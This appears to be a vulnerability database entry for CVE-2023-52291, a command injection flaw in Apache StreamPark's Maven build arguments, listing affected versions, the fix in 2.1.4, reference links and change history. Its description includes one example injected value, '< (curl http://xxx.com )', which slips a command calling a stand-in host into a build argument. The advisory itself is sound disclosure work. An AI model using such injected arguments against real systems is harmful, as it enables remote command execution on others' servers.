CVE-2023-52291 Details
Description
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4, The "<" operator will blocked。
Metrics
CVSS 4.0 Severity and Vector Strings:
No CVSS 4.0 data is available for this CVE.
CVSS 3.x Severity and Vector Strings:
No data available for CVSS Version 2.0 on this CVE.
CISA-ADP
Assessed Jul 22, 2024References to Advisories, Solutions, and Tools
By selecting these links, you will be leaving this site. These are references gathered from the official CVE record and are not endorsed by Volerion.
| URL | Source(s) | Tag(s) |
|---|---|---|
| https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf | CVE | Mailing List |
| http://www.openwall.com/lists/oss-security/2024/07/17/1 | CVE | Mailing List |
| https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf | [email protected] | Mailing List |
| http://www.openwall.com/lists/oss-security/2024/07/17/1 | [email protected] | Mailing List |
Weakness Enumeration
| CWE-ID | CWE Name | Source |
|---|---|---|
| CWE-77 | Improper Neutralization of Special Elements used in a Command ('Command Injection') | [email protected] |
Affected Products
| Product | Versions |
|---|---|
| apache streampark | >= 2.0.0, < 2.1.4 |
CPE
Remediation
| |
Change History
9 change records found show changes
| Date | Action | Recorded By |
|---|---|---|
| Jun 17, 2026 | CVE Modified | CISA-ADP |
| Jun 17, 2026 | CVE Modified | [email protected] |
| Feb 13, 2025 | CVE Modified | [email protected] |
| Nov 21, 2024 | CVE Modified | CVE |
| Aug 1, 2024 | CVE Modified | CISA-ADP |
| Jul 22, 2024 | CVE Modified | [email protected] |
| Jul 19, 2024 | Initial Analysis | [email protected] |
| Jul 17, 2024 | CVE Modified | [email protected] |
| Jul 17, 2024 | New CVE Received | [email protected] |